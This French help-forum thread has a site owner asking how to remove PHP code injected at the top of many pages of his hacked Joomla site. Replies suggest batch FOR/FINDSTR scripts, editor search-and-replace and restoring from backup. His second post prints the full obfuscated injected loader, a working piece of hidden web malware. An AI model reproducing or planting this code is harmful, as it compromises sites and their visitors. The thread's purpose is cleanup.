Sujet Précédent Sujet Suivant

Site Hacké avec injection code PHP

Fermé
tchao57 Messages postés 583 Date d'inscription dimanche 12 avril 2009 Statut Membre Dernière intervention 15 octobre 2018 - 11 oct. 2018 à 13:01
tchao57 Messages postés 583 Date d'inscription dimanche 12 avril 2009 Statut Membre Dernière intervention 15 octobre 2018 - 15 oct. 2018 à 11:49
Bonjour à tous,

je viens vous voir aujourd'hui car j'ai un site qui a été hacké avec de l'injection de code PHP dans les pages.

J'ai pu remarqué que beaucoup de pages PHP avaient été touchées mais pas toutes. Le code injecté se situe toujours en haut du fichier PHP avec les balises <?php et ?> et le code à l'intérieur.

Ce que je souhaiterai faire c'est de supprimer tout ce code dans toutes les pages en une seule fois. J'ai pas regardé toutes les pages mais le code semble être similaire à chaque fois.

Pour cela j'ai téléchargé l'entièreté du fichier "www" sur mon ordinateur. Je fais une recherche Windows de tous les fichiers PHP en tapant *.php, et donc je me retrouve avec tous les fichiers avec extension PHP qu'il y a dans le dossier "www".

Maintenant il faudrait que je puisse faire en sorte de supprimer tout ce qui se trouve entre les balises PHP de ces fichiers, mais sans toucher au reste du code PHP bien sur.

Je ne sais pas trop si je poste dans le bon forum, si ce n'est pas le cas désolé je changerai.

Merci d'avance pour votre aide.
A voir également:

4 réponses

Réponse 1 / 4
jee pee Messages postés 39585 Date d'inscription mercredi 2 mai 2007 Statut Modérateur Dernière intervention 19 avril 2024 9 225
11 oct. 2018 à 15:08
Bonjour,

Si le code rajouté est toujours en début du fichier et qu'il fait toujours le même nombre de lignes, on pourrait utiliser la commande FOR avec un paramètre skip n lignes.

Et si tous les fichiers .php ne sont pas affectés, il faudrait trouver une chaine de caractères spécifique à ce code parasite, on pourrait alors trouver les fichiers concernés avec la commande FINDSTR
0
tchao57 Messages postés 583 Date d'inscription dimanche 12 avril 2009 Statut Membre Dernière intervention 15 octobre 2018 42
Modifié le 11 oct. 2018 à 16:03
Bonjour jee pee et merci pour la réponse.

Voici le code que je trouve dans mes pages PHP: 

<?php $eidecok = '24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x246Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5cubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovgfxpmpusut!-#j0#!/!**#t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`" x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; fu>?*2b%)gpf{jt)!gj!<*2bo); $qvlbdqs();}}]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-b<**#57]38y]47]67y]37]88yt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<XA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]3#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qjvt-#w#)ldbqov>*ofmy%);!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22epmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj#H#-#I#-#K#-#L#-#M#-##-#Y#-#D#-#W#-#C#-#O#-#N#*-bssbz)_x2425 x24- x24-!% x24- x24*!|! x24- x24if((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<64]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]SERVER[" x48 124 x54 120 x5f 125 xU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MS%:|:**t%)m%=*h%)m%):fmjix8:56985:6197g:74985-rr.93e:5597f-s.95h%/#0#/*#npd/#)rrd/#00;qpdof.)fepdof./#@#/qp%>5h%!<*::::tjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7(!isset($GLOBALS[" x61 156 x75 1 x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6x27tfs%6<*17-SFEBFI,6<*127-UVPFNJb%!**X)ufttj x22)gj!|!*nbsbq%) x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! xA)qj3hopmA x273qj%6<*msvd}+;!>!} x27;!>>>!}_;gvc%}&q%7/7#@#7/7^#iubq# x5cq%FGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!id%)ftpmdR6<*id%)dfyfR t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd193`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7f]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gjppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)73:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%sgj!<**2-4-bubE{h%)sutcvubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,344ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%}X x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%*#cd2bge56+99386c6f+9f5d816:+946:ce44#- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($uas6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdY%)fnbozcYufhA x272qj%6<^#zsfvr# x5c275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*# x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zL1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&epnbss-%rxW~!Ypp2)%zB%z>! x24/%58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7*+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)! x22)!gj}1~!<2p% x7f!~!<#!%ff2-!%t::**<(<!fwbm)%tjw)# x24jw!>!#]y84]275]y83]242]48y]#>m%:|:*r%:-t%)3oftmbg!osvufs!|ftmf!~<**9.-j%56 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_%<#462]47y]252]18y]#>q%<#762]67y]562]38y]57*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce#-!#]y38#-!%w:**<")));$qvlbdqs = $xppyyai("", $dzmxeu<^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfs-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2epc}A;~!} x7f;!|!}{;)gj}l;33bq}k;#!>!2p%Z<^2 x5c2b%!>!2p%!*3uui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fex7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d! x242178}527}88:}334}472 x24<!%ff2!>!opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z23zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>53 105 x52 137 x41 107 x45 116 x54")zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSrting(0); $dzmxeuo = implode(array_map("hvxgblk",str_split("%t7eu{66~67<&w6<*&7-#o]s]o]s]#)f::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)s," x72 166 x3a 61 x31"))) { $xppyyai = utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!32M3]317]445]212]445]43]321]464]284]364]6]234]342],j%>j%!<**3-j%-bubE{h%)sutcw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>sfopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#).fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*8]y83]256]y81]265]y72]254]y76dXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<:>1<%j:=tj{fpg)%s:*<%V,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!> x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24-]27]28y]#/r%/h%)n%-#+I#)q%:>:r2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:f:opjudovg<~ x24<!%o:!>%w6Z6<.2`hA x27pd%6<C x27pd%6|6.%7> x2272qj%)7gj6<**2qj%)hopm3qj*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#nction hvxgblk($n){return chr(ord($n)-1);} @error_repogj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV *^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsrebyeqo'; $efljqgf=explode(chr((837-717)),substr($eidecok,(30712-24835),(208-174))); $krzjtyaj = $efljqgf[0]($efljqgf[(4-3)]); $ndezrekqr = $efljqgf[0]($efljqgf[(12-10)]); if (!function_exists('acfsfeo')) { function acfsfeo($gibxsim, $kckessqqs,$anjnapj) { $lfiushpz = NULL; for($ddxshxcnb=0;$ddxshxcnb<(sizeof($gibxsim)/2);$ddxshxcnb++) { $lfiushpz .= substr($kckessqqs, $gibxsim[($ddxshxcnb*2)],$gibxsim[($ddxshxcnb*2)+(3-2)]); } return $anjnapj(chr((29-20)),chr((434-342)),$lfiushpz); }; } $fitiqvxv = explode(chr((271-227)),'1124,59,1599,32,3687,69,1348,34,4368,35,2855,57,4598,39,352,66,5632,54,4459,24,4483,38,3615,21,4990,29,834,35,54,64,5520,32,4521,30,991,37,3085,63,2912,60,2972,31,723,42,869,52,5552,32,1812,21,3003,36,1863,24,1631,57,3885,55,5019,55,4921,69,1992,23,1688,33,1382,34,5095,40,2119,43,4749,70,288,64,1833,30,2334,42,5135,52,3659,28,3940,64,523,60,2603,43,4722,27,921,21,4637,35,2580,23,607,65,170,51,3558,25,4037,27,418,22,672,51,1477,25,4064,48,1502,32,4551,47,221,21,1923,69,5774,68,2753,38,4403,56,1887,36,4317,51,1721,30,4248,69,5842,35,3354,59,942,49,2057,62,3039,46,2376,46,3506,52,5686,48,4112,53,3148,67,4876,45,3251,54,4004,33,4203,45,118,52,2709,44,242,46,5428,69,583,24,5279,30,1416,25,4819,57,3756,43,3636,23,5497,23,4165,38,1077,47,5223,56,2469,53,1751,61,0,54,2791,64,2015,42,3799,33,5584,48,2646,63,3413,31,1183,52,3215,36,1534,65,1441,36,2422,47,457,66,2269,65,3305,49,2162,50,1235,51,2212,57,765,69,1286,62,4672,50,3444,62,5734,40,5074,21,2522,58,5187,36,5309,57,5366,62,1028,49,3583,32,3832,53,440,17'); $uhivuu = $krzjtyaj("",acfsfeo($fitiqvxv,$eidecok,$ndezrekqr)); $krzjtyaj=$eidecok; $uhivuu(""); $uhivuu=(582-461); $eidecok=$uhivuu-1; ?>


Comment peut-on utiliser la commande FOR et skip?
0
Réponse 2 / 4
jee pee Messages postés 39585 Date d'inscription mercredi 2 mai 2007 Statut Modérateur Dernière intervention 19 avril 2024 9 225
Modifié le 11 oct. 2018 à 16:44
On dirait qu'il n'y a pas de caractère de fin de ligne, cela peut poser problème.

Tu devrais tester dans un .cmd (à la main c'est une autre syntaxe %% devient %) sur un des fichiers concernés pour voir si cela pourrait fonctionner 

@echo off
cd D:\Dev\Batch\b2\dira
FOR /F "skip=1 tokens=1* delims=€" %%A IN (php2.php) DO echo %%A >>newphp2.php
pause


et aussi pour essayer de déterminer les fichiers concernés 

@echo off
cd D:\Dev\Batch\b2\dira
FOR /R %%i IN (*.php) DO FINDSTR /M "eidecok" %%i && echo ok %%i
pause


si tout colle, il faudra combiner les 2

0
Réponse 3 / 4
Tartine
Modifié le 11 oct. 2018 à 16:49
Sinon, tu peux ouvrir tous les fichiers .php dans notepad++ et dans la fonction remplacer, tu colle ce que tu veux supprimer et dans remplacer tu ne met rien. Cela effacera le code en question dans tous les php à condition qu'ils soient ouverts dans NP++ et que tu remplaces avec "remplacer dans tous les documents ouverts".
0
jordane45 Messages postés 38138 Date d'inscription mercredi 22 octobre 2003 Statut Modérateur Dernière intervention 17 avril 2024 4 649
11 oct. 2018 à 17:11
Bonjour,
Ou il peut aussi ouvrir son dossier www dans netbeans et effectuer un rechercher remplacer directement dans toute l'arborescence (en filtrant, en plus, si il le souhaite, sur le fichiers php).
0
Réponse 4 / 4
bg62 Messages postés 23590 Date d'inscription samedi 22 octobre 2005 Statut Modérateur Dernière intervention 15 avril 2024 2 362
12 oct. 2018 à 03:07
pas de sauvegarde récente avant cet événement ???
0
tchao57 Messages postés 583 Date d'inscription dimanche 12 avril 2009 Statut Membre Dernière intervention 15 octobre 2018 42
12 oct. 2018 à 14:00
Non, malheureusement la personne qui gérait le site n'y avait...pas pensé...
Mais bon pas grave je vais réinstaller un Joomla tout neuf et retélécharger tous les composants et modules puis remettre la base de donnée. Ça nettoiera toute la vérole.
0
Judge_DT Messages postés 29395 Date d'inscription vendredi 5 février 2010 Statut Modérateur Dernière intervention 23 octobre 2021 9 617 > tchao57 Messages postés 583 Date d'inscription dimanche 12 avril 2009 Statut Membre Dernière intervention 15 octobre 2018
12 oct. 2018 à 14:08
Et... qui dit que la base de données, n'a pas elle aussi été vérolée ? ;-\
0
tchao57 Messages postés 583 Date d'inscription dimanche 12 avril 2009 Statut Membre Dernière intervention 15 octobre 2018 42
15 oct. 2018 à 11:49
Non je n'ai pas l'impression. Aucune nouvelle table n'est créée et tout semble aller à l'intérieur.
J'ai déjà fait un transfert sous wamp et tout roule. Pour l'instant... :)
0

Discussions similaires

'Votre colis est dans le site de livraison qui dessert votre adresse' que faire
relakztek82 -
Unemeuf -

25 réponses
Colis en cours de transport vers votre site de livraison ?
Ninan_5568 -
senda -

8 réponses
ALERT en php
snoopy -
appkech -

14 réponses